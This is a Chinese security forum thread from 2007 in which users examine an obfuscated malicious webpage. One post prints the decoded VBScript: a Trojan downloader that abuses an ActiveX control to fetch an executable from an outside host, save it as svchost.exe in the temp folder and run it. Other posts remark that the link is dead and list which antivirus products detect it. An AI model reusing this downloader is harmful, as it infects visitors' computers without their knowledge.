变态网页加密

mofunzone

楼上的把自动回复贴出来做什么。。

mmll888

原帖由 mofunzone 于 2007-2-3 14:06 发表
楼上的把自动回复贴出来做什么。。

啊,原来是sys的自动回复啊!

eubyo

多层网页加密Trojan-Downloader最终还是要现形的

<SCRIPT LANGUAGE="Javascript">
<!--
var Jianbang1989 ="    <html>
    <script language="VBScript">
    on error resume next
    m1="object"
    m2="classid"
    m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    m4="Microsoft.XMLHTTP"
    m5="Shell.Application"
    m6="Scripti"&"ng.Fil"&"eSystemObject"
    Set XsKjc = document.createElement(m1)
    XsKj = "http://dltiantang.com/hah.exe"
    XsKjc.setAttribute m2, m3
    XsKji=m4
    Set XsKjd = XsKjc.CreateObject(XsKji,"")
    yhangf="Ado"
    yhangg="db."
    yhangh="Str"
    yhangi="eam"
    XsKjf=yhangf&yhangg&yhangh&yhangi
    XsKjg=XsKjf
    set XsKja = XsKjc.createobject(XsKjg,"")
    XsKja.type = 1
    XsKjh="G"&"E"&"T"
    XsKjd.Open XsKjh, XsKj, False
    XsKjd.Send
    XsKj9="svchost.exe"
    set XsKjb = XsKjc.createobject(m6,"")
    set XsKje = XsKjb.GetSpecialFolder(2)
    XsKja.open
    XsKj8="XsKja.BuildPath(XsKja,XsKj8)"
    XsKj7="XsKjb.BuildPath(XsKjb,XsKj7)"
    XsKj6="XsKjc.BuildPath(XsKjd,XsKj6)"
    XsKj5="XsKjd.BuildPath(XsKjf,XsKj5)"
    XsKj4="XsKje.BuildPath(XsKjg,XsKj4)"
    XsKj3="XsKjf.BuildPath(XsKjh,XsKj4)"
    XsKj2="XsKjg.BuildPath(XsKji,XsKj3)"
    XsKj1="XsKjh.BuildPath(XsKjg,XsKj1)"
    XsKj0="XsKji.BuildPath(XsKjk,XsKj0)"
    XsKj9= XsKjb.BuildPath(XsKje,XsKj9)
    XsKja.write XsKjd.responseBody
    XsKja.savetofile XsKj9,2
    XsKja.close
    set XsKje = XsKjc.createobject(m5,"")
    XsKje.ShellExecute XsKj9,BBS,BBS,"o"&"p"&"e"&"n",0
    </script>
    </html>
"
function SetNewWords()
{
var NewWords;
NewWords=unescape(Jianbang1989);
document.write(NewWords);
}
SetNewWords();
// -->
</SCRIPT>

flykiss

驱逐舰过了..............

qyb179

微点没报

jimmyleo

原帖由 mmll888 于 2007-2-3 14:08 发表


啊,原来是sys的自动回复啊!

这真是汗啊 英语啊 还好不是德文~

随风流月

这个木马远程下载已经无效了
404-File Not Found.

随风流月

3层的 URL Encode 实际上根本没有什么技术含量
随便找个网页就破解了

worker321

avk，小红伞，蜘蛛都挂了！！